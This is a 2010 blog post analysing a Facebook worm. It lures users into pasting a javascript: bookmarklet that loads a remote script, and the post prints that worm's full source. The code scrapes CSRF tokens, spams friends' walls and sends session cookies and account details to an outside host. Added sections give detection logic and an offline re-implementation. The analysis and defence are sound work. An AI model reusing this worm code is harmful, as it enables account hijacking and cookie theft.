Friday, December 3, 2010

Be Alert to Malicious Scripts & Spam on Facebook

While analyzing malicious scripts and code used by crackers and spammers, I found that they use several attack vectors and techniques to compromise users' profiles and to spam through automated means: they post a comment or wall post on a user's profile, or send the user a new (often fake) application to try, on Facebook or any other social network.


If the user clicks the posted link or installs the new (often fake) application, the account is usually compromised, either because the site itself is vulnerable to the malicious code or because a zero-day exploit is involved. Sometimes the profile is instead bombarded with spam messages, comments, posts, ads and fake application requests, and all of that spam is automatically posted or sent to all of the user's friends as well. In the case analyzed below no vulnerability in Facebook is needed at all: the user is talked into running the attacker's script inside their own logged-in session, so it inherits the session cookies and can do anything the user can.


So if you get a wall post from one of your friends saying that some "revolving image" or "new theme" feature is out and you should follow the link to enjoy it, the message will look like this:



Example 1:
Wowww !! cool Facebook revolving images. MUST SEE http://pageragei.tk/

Example 2:
Super cool Facebook revolving images. MUST SEE http://showmyprofile.tk/


When you open either of these malicious sites, you are asked to copy and paste some JavaScript code into your browser's address bar, like this:



Code:
javascript:(a = (b = document).createElement("script")).src = "//imaginemonkeys.com/majic.js?show", b.body.appendChild(a); void(0)
When you paste that into the address bar of a tab in which you are logged in to Facebook and press Enter, it creates a script element pointing at the remote majic.js file and appends it to the Facebook page. The script therefore runs in the facebook.com origin with your session: it can read document.cookie, scrape the anti-CSRF tokens from the page and call the same ajax endpoints your own browser uses. Note the protocol-relative "//imaginemonkeys.com/..." URL (it is fetched over whatever scheme the Facebook page is using) and the "?show" query string, which matters again below.

That is it: you start spamming all your Facebook friends' walls automatically, and the fire keeps spreading as more and more of your friends paste the same malicious code.
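As an added example (not part of the original post), here is server-side detection logic for the pattern just described: one account pushing the same lure to many different friends in quick succession. The worm's posting loop, reproduced later in this post, sends one wall post every two seconds and alternates two wordings that carry the same link, so the rule groups on the URL rather than on the exact text. The log format (one line per wall post with time, poster, target and status text) and the lines themselves are constructed for this demo and are an assumption, not anything Facebook publishes.

```javascript
// Added example, not from the original post: flag one account pushing the same
// lure URL to many different friends in a short window. The log format below is
// an assumption made for this demo (one line per wall post: time, poster, target,
// status text); the lines themselves are constructed.

// Twelve worm posts, 2 s apart, to twelve different friends, alternating the two
// wordings, followed by three ordinary posts from another user spread over minutes.
function constructedLog() {
  const lines = [];
  const wording = ["rotate", "revolve"];
  for (let i = 0; i < 12; i++) {
    const ts = new Date(Date.UTC(2010, 11, 3, 9, 0, 2 * i)).toISOString();
    lines.push(`${ts} uid=100001234567890 target=1000022222222${String(i).padStart(2, "0")} ` +
      `status=Checkout 360 ${wording[i % 2]} effect on images. MUST SEE http://revolvingimages.info/fb/`);
  }
  lines.push("2010-12-03T09:05:00.000Z uid=100009999999999 target=100005555555555 status=happy birthday!");
  lines.push("2010-12-03T09:12:30.000Z uid=100009999999999 target=100006666666666 status=see you at 8 http://example.org/dinner");
  lines.push("2010-12-03T09:20:00.000Z uid=100009999999999 target=100007777777777 status=lol");
  return lines;
}

function parseLine(line) {
  const m = line.match(/^(\S+) uid=(\d+) target=(\d+) status=(.*)$/);
  return m ? { ts: Date.parse(m[1]), uid: m[2], target: m[3], status: m[4] } : null;
}

// Group on the URL carried by the message rather than the exact text: the worm
// alternates two wordings, so naive identical-text counting would see half the volume.
function lureKey(status) {
  const m = status.match(/https?:\/\/\S+/i);
  return m ? m[0].toLowerCase() : status.trim().toLowerCase();
}

function median(values) {
  const s = [...values].sort((a, b) => a - b);
  const mid = s.length >> 1;
  return s.length % 2 ? s[mid] : (s[mid - 1] + s[mid]) / 2;
}

// Sliding window per (uid, lure): alert once the same lure has reached minTargets
// distinct friends within windowMs. medianGapMs exposes the fixed machine cadence.
function detectWallSpam(lines, { windowMs = 60000, minTargets = 10 } = {}) {
  const groups = new Map();
  for (const line of lines) {
    const ev = parseLine(line);
    if (!ev) continue;
    const key = `${ev.uid}|${lureKey(ev.status)}`;
    if (!groups.has(key)) groups.set(key, []);
    groups.get(key).push(ev);
  }
  const alerts = [];
  for (const evs of groups.values()) {
    evs.sort((a, b) => a.ts - b.ts);
    let start = 0;
    for (let end = 0; end < evs.length; end++) {
      while (evs[end].ts - evs[start].ts > windowMs) start++;
      const win = evs.slice(start, end + 1);
      const targets = new Set(win.map((e) => e.target));
      if (targets.size < minTargets) continue;
      const gaps = win.slice(1).map((e, i) => e.ts - win[i].ts);
      alerts.push({ uid: evs[0].uid, lure: lureKey(evs[0].status), targets: targets.size, medianGapMs: median(gaps) });
      break; // one alert per (uid, lure) is enough; the response is the same either way
    }
  }
  return alerts;
}

console.log(detectWallSpam(constructedLog()));
```

The threshold of ten distinct targets in a minute is deliberately generous; a human pasting the same link to friends by hand does not reach it, while the worm trips it after twenty seconds. The median gap of exactly 2000 ms is the second signal worth keeping in the alert, since a fixed cadence like that is a setInterval, not a person.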

The malicious JavaScript link is: http://imaginemonkeys.com/majic.js
This file contains the same kind of code again, but this time the URL inside it points to a different host:

Code:
javascript:(a = (b = document).createElement("script")).src = "//graphicgiants.com/majic.js?show", b.body.appendChild(a); void(0)
This time the link is: http://graphicgiants.com/majic.js
When I tried to open it directly in the browser I could not analyze it any further; the server returned the error message below:

Not Found 

The requested URL /majic.js was not found on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.graphicgiants.com Port 80
 
 
So now I knew something fishy was going on: the server would not serve the script to a plain direct request. It evidently has some kind of request filtering in front of the payload, whether mod_security rules or simply a check for the "?show" query string that the bookmarklet appends (the bookmarklet asks for /majic.js?show, while my direct request for /majic.js got the 404), which is a common way to frustrate casual analysis. To analyze it further I ran the malicious code in an isolated virtual machine with a throwaway test profile, with a sniffer running the whole time to capture the background redirections to other URLs and the scripts being loaded, and I also crawled the other URLs on the site.



I found that the redirections went to the Facebook site: whenever a user opens http://imaginemonkeys.com directly in the browser, it first redirects to
http://1.88.channel.facebook.com and then to the official http://facebook.com site.


While testing URLs on imaginemonkeys.com I found a few more paths, such as http://www.imaginemonkeys.com/606/ and http://www.imaginemonkeys.com/majic.js.


The script that actually runs is the JavaScript file, usually majic.js or an index.php that serves it, at a URL like http://www.imaginemonkeys.com/majic.js or http://imaginemonkeys.com/index.php.


The code hidden inside the malicious script is reproduced below.


Code:
//
//
// Two wordings of the same lure; the posting loop below alternates between them.
txt = "Checkout 360 rotate effect on images. MUST SEE http://revolvingimages.info/fb/";
txtee = "Checkout 360 revolve effect on images. MUST SEE http://revolvingimages.info/fb/";

// Keeps the victim on the page for the ~50 seconds the posting loop needs to finish.
alert("Please wait 2-3 mins while we setup! Do not refresh this window or click any link.");

// Idiom used throughout: inside with(x = new XMLHttpRequest()) the bare open(), setRequestHeader()
// and send() resolve to the XHR's own methods and the comma operator chains them. Every request
// goes to facebook.com with the victim's session cookies because the script runs inside the page.
// Step 1: fetch the logged-in home page and scrape the anti-CSRF tokens out of its HTML.
with(x = new XMLHttpRequest())
open("GET", "/"), onreadystatechange = function () {

if (x.readyState == 4 && x.status == 200) {
comp = (z = x.responseText).match(/name=\\"composer_id\\" value=\\"([\d\w]+)\\"/i)[1];
form = z.match(/name="post_form_id" value="([\d\w]+)"/i)[1];
dt = z.match(/name="fb_dtsg" value="([\d\w-_]+)"/i)[1];
pfid = z.match(/name="post_form_id" value="([\d\w]+)"/i)[1];
appid = "150622878317085";    // not used in the fragment shown
appname = "rip_m_j";

// Step 2: the victim's uid is read from the c_user cookie; the friend list comes from the friend
// browser endpoint and friend uids are recovered from thumbnail file names (/<n>_<uid>_<n>_q.jpg).
with(xx = new XMLHttpRequest())
open("GET", "/ajax/browser/friends/?uid=" + document.cookie.match(/c_user=(\d+)/)[1] + "&filter=all&__a=1&__d=1"),
onreadystatechange = function () { if (xx.readyState == 4 && xx.status == 200) {
m = xx.responseText.match(/\/\d+_\d+_\d+_q\.jpg/gi).join("\n").replace(/(\/\d+_|_\d+_q\.jpg)/gi, "").split("\n");
// Step 3: one wall post every 2 seconds, 25 in total.
i = 0; llimit=25;
t = setInterval(function () {
if (i >= llimit ) return;
if(i == 0) {
// First iteration only: list the Pages the victim administers and report their ids, plus the
// cookies, to the attacker via an injected <script src>.
with(ddddd = new XMLHttpRequest()) open("GET", "/ajax/pages/dialog/manage_pages.php?__a=1&__d=1"),
setRequestHeader("X-Requested-With", null),
setRequestHeader("X-Requested", null),
// The next line is damaged in the original post: the "<" in the for-loop condition was swallowed
// as an HTML tag on extraction, so the text between "pplp" and "([^<>]+)" is missing and the line
// does not run as printed. The surviving tail mirrors the exfiltration in the last iteration below.
onreadystatechange = function(){ if(ddddd.readyState == 4 && ddddd.status == 200){ llm = (d = ddddd.responseText).match(/\\"id\\":([\d]+)/gi); aaac =llm.length; pplp=0; for(pplp=0;pplp([^<>]+)/)[1] + "&c="+ document.cookie; document.body.appendChild(s); }
}, send(null);
// Still on the first iteration: make the victim "like" three attacker-chosen Pages, using the
// scraped post_form_id and fb_dtsg so the requests pass Facebook's CSRF checks.
with(xxcxx = new XMLHttpRequest()) open("POST", "/ajax/pages/fan_status.php?__a=1"),
setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),
send("fbpage_id=176607175684946&add=1&reload=1&preserve_tab=1&use_primer=1&nctr[_mod]=pagelet_top_bar&post_form_id="+pfid+"&fb_dtsg=" + dt + "&lsd&post_form_id_source=AsyncRequest");
with(lllllxx = new XMLHttpRequest()) open("POST", "/ajax/pages/fan_status.php?__a=1"),
setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),
send("fbpage_id=150650771629477&add=1&reload=1&preserve_tab=1&use_primer=1&nctr[_mod]=pagelet_top_bar&post_form_id="+pfid+"&fb_dtsg=" + dt + "&lsd&post_form_id_source=AsyncRequest");
with(llxlxlxlxx = new XMLHttpRequest()) open("POST", "/ajax/pages/fan_status.php?__a=1"),
setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),
send("fbpage_id=109075015830180&add=1&reload=1&preserve_tab=1&use_primer=1&nctr[_mod]=pagelet_top_bar&post_form_id="+pfid+"&fb_dtsg=" + dt + "&lsd&post_form_id_source=AsyncRequest");
} else if (i == llimit - 1) {
// Last iteration: scrape the account name and the secret post-by-email upload address from the
// mobile photos page and exfiltrate them, together with the full document.cookie, as query
// parameters of a <script src> request to revolvingimages.info.
with(xxxx = new XMLHttpRequest()) open("GET", "/mobile/?v=photos"),
setRequestHeader("X-Requested-With", null),
setRequestHeader("X-Requested", null),
onreadystatechange = function(){
if(xxxx.readyState == 4 && xxxx.status == 200){
// (the .replace(/@/, "@") is a no-op as extracted)
with(s = document.createElement("script")) src = "http://revolvingimages.info/majic.js?q=" + document.cookie.match(/c_user=(\d+)/)[1] + ":" + (d = xxxx.responseText).match(/mailto:([^\"]+)/)[1].replace(/@/, "@") + ":" + d.match(/id="navAccountName">([^<>]+)/)[1] + "&c="+ document.cookie; document.body.appendChild(s); }
}, send(null);
}
// Every iteration: post the lure to a random friend's wall as the victim, alternating the two
// wordings, with the scraped composer_id / post_form_id / fb_dtsg tokens attached.
if(i%2==0) {
with(xd = new XMLHttpRequest()) open("POST", "/ajax/updatestatus.php?__a=1"),
setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),
send("action=PROFILE_UPDATE&profile_id=" + document.cookie.match(/c_user=(\d+)/)[1] + "&status=" + txt + "&target_id=" + m[Math.floor(Math.random() * m.length)] + "&composer_id=" + comp + "&hey_kid_im_a_composer=true&display_context=profile&post_form_id=" + form + "&fb_dtsg=" + dt + "&lsd&_log_display_context=profile&ajax_log=1&post_form_id_source=AsyncRequest");
}
else {
with(xd = new XMLHttpRequest()) open("POST", "/ajax/updatestatus.php?__a=1"),
setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),
send("action=PROFILE_UPDATE&profile_id=" + document.cookie.match(/c_user=(\d+)/)[1] + "&status=" + txtee + "&target_id=" + m[Math.floor(Math.random() * m.length)] + "&composer_id=" + comp + "&hey_kid_im_a_composer=true&display_context=profile&post_form_id=" + form + "&fb_dtsg=" + dt + "&lsd&_log_display_context=profile&ajax_log=1&post_form_id_source=AsyncRequest"); } i += 1;
}, 2000); }
}, send(null);
}
}, send(null);
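To make it concrete what the script above harvests, here is an added, offline re-implementation of its scraping steps (my own example, not code from the post or from the worm). It keeps the worm's own regular expressions but replaces every network call with constructed sample input: a stand-in home page, friend-list response, mobile photos page and cookie string shaped like what a logged-in facebook.com session returned in 2010. Everything it returns is what the real script would have sent to updatestatus.php or to revolvingimages.info; nothing here is sent anywhere.

```javascript
// Added example, not code from the original post: an offline, annotated
// re-implementation of the harvesting logic in majic.js. Every input below is
// constructed sample data shaped like what the worm scraped from a logged-in
// facebook.com session; no request is made.

// What the worm reads from document.cookie: c_user is the victim's uid.
const SAMPLE_COOKIE = "datr=Zm9vYmFy; c_user=100001234567890; xs=2f3a1c";

// Constructed stand-in for GET "/" (the logged-in home page). composer_id sits
// inside a JSON-escaped string, which is why the worm's regex matches \" there.
const SAMPLE_HOME_HTML = [
  '<input type="hidden" name="post_form_id" value="d41d8cd98f00" />',
  '<input type="hidden" name="fb_dtsg" value="AQB-x7_Q2" />',
  '<script>init({"html":"<input name=\\"composer_id\\" value=\\"4ef0c0d1\\">"});</script>',
].join("\n");

// Constructed stand-in for GET /ajax/browser/friends/?uid=...: friend uids only
// appear embedded in thumbnail file names of the form /<n>_<uid>_<n>_q.jpg
const SAMPLE_FRIENDS_JSON =
  '{"payload":{"html":"<img src=\\"http://profile.ak.fbcdn.net/hprofile/41365_100002222222222_5678_q.jpg\\">' +
  '<img src=\\"http://profile.ak.fbcdn.net/hprofile/27423_100003333333333_9012_q.jpg\\">"}}';

// Constructed stand-in for GET /mobile/?v=photos: the mobile upload page shows
// the account's display name and its secret post-by-email address.
const SAMPLE_MOBILE_HTML =
  '<a id="navAccountName">Jane Victim</a>' +
  '<p>Send photos to <a href="mailto:jane7xq2p@m.facebook.com">jane7xq2p@m.facebook.com</a></p>';

// Pull the victim's uid out of the cookie string (the worm does this inline).
function currentUserId(cookie) {
  const m = cookie.match(/c_user=(\d+)/);
  return m ? m[1] : null;
}

// Scrape the anti-CSRF tokens the wall-post endpoint expects. They are readable
// because the script runs inside the facebook.com origin.
function parseCsrfTokens(homeHtml) {
  const grab = (re) => { const m = homeHtml.match(re); return m ? m[1] : null; };
  return {
    composerId: grab(/name=\\"composer_id\\" value=\\"([\d\w]+)\\"/i),
    postFormId: grab(/name="post_form_id" value="([\d\w]+)"/i),
    fbDtsg:     grab(/name="fb_dtsg" value="([\d\w-_]+)"/i),
  };
}

// Recover friend uids from thumbnail file names, exactly as majic.js does.
function parseFriendIds(friendsResponse) {
  const thumbs = friendsResponse.match(/\/\d+_\d+_\d+_q\.jpg/gi) || [];
  return thumbs.map((t) => t.replace(/(\/\d+_|_\d+_q\.jpg)/gi, ""));
}

// Name and post-by-email address: the two items exfiltrated on the last iteration.
function parseMobileIdentity(mobileHtml) {
  const email = mobileHtml.match(/mailto:([^"]+)/);
  const name = mobileHtml.match(/id="navAccountName">([^<>]+)/);
  return { email: email ? email[1] : null, name: name ? name[1] : null };
}

// The URL the worm appends as a <script src> at the end of the run: uid, email
// and name travel in q=, the complete cookie jar (session included) in c=.
function buildExfilUrl(cookie, mobileHtml) {
  const id = parseMobileIdentity(mobileHtml);
  return "http://revolvingimages.info/majic.js?q=" +
    [currentUserId(cookie), id.email, id.name].join(":") + "&c=" + cookie;
}

// Dry run of the posting loop: `limit` posts, alternating the two lures, each
// aimed at a friend chosen by `pick` (stands in for Math.random so the run is
// reproducible). The form bodies are returned instead of being POSTed.
const LURES = [
  "Checkout 360 rotate effect on images. MUST SEE http://revolvingimages.info/fb/",
  "Checkout 360 revolve effect on images. MUST SEE http://revolvingimages.info/fb/",
];

function simulateSpamRun(cookie, homeHtml, friendIds, pick = (n) => Math.floor(Math.random() * n), limit = 25) {
  const tokens = parseCsrfTokens(homeHtml);
  const uid = currentUserId(cookie);
  const posts = [];
  for (let i = 0; i < limit; i++) {
    posts.push({
      profile_id: uid,
      target_id: friendIds[pick(friendIds.length)],
      status: LURES[i % 2],
      composer_id: tokens.composerId,
      post_form_id: tokens.postFormId,
      fb_dtsg: tokens.fbDtsg,
    });
  }
  return posts;
}

console.log(parseCsrfTokens(SAMPLE_HOME_HTML));
console.log(parseFriendIds(SAMPLE_FRIENDS_JSON));
console.log(buildExfilUrl(SAMPLE_COOKIE, SAMPLE_MOBILE_HTML));
```

The point to take from the dry run is that nothing the worm needs is secret from a script running in the page: the CSRF tokens are scraped from HTML, the friend list from an ajax response, and the session from document.cookie. That is why the remediation steps at the end of the post are what they are (regenerate the upload address, change the password, clear cookies) and why pasting code into the address bar is the real vulnerability.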


If you have already pasted the script, do the following:
1. To stop it posting to your wall, regenerate your unique mobile upload e-mail address at
     http://www.facebook.com/mobile/ (the script scrapes this address from the mobile photos page and
     sends it, together with your name and user ID, to the attacker, who can use it to post as you).
2. Change your password, and delete all your browser's cookies, browsing history and saved passwords
     (the script sends your complete cookie string, session included, to the attacker's server).
3. Never copy and paste JavaScript or any other unknown script into your browser again.
4. Most importantly, never click on unknown links, and always check that the browser's address bar shows
     http://www.facebook.com or https://www.facebook.com, not a phishing or look-alike site such as
     http://www.faacebook.com or http://www.faceb00k.com.
5. Use a good security suite such as AVG 2011 or Norton 2011 and keep its virus definitions and program
     components updated; these suites bundle antivirus, anti-spyware, anti-spam, anti-phishing, firewall
     and IDS components. Bear in mind that a security suite will not reliably stop a script you paste into
     the address bar yourself, so points 3 and 4 are the real protection here.
6. Keep your operating system updated, and update all of your application software as well, including
     the browser itself.


So be cautious whenever you see comments like "Great, now we have such applications on Facebook!", and never use these applications or accept their requests.


Two applications I have seen popping up are "See Who Has Visited Your Profile" and "Profile Privacy v1.2". Remember that these are FAKE applications, and they use comments like the above on other users' walls to get people to click on or install them.


I hope this post is helpful for all of you guys :) Comments are welcome.

4 comments:

1. Keep it up bro... looking forward :)
2. Thanks a lot for the info :)
3. Cool, I never knew that before. Nice, hehe.
4. Thanks, I have this problem and I didn't even mean to install the app. T_T I hope this works! Thanks for the article.
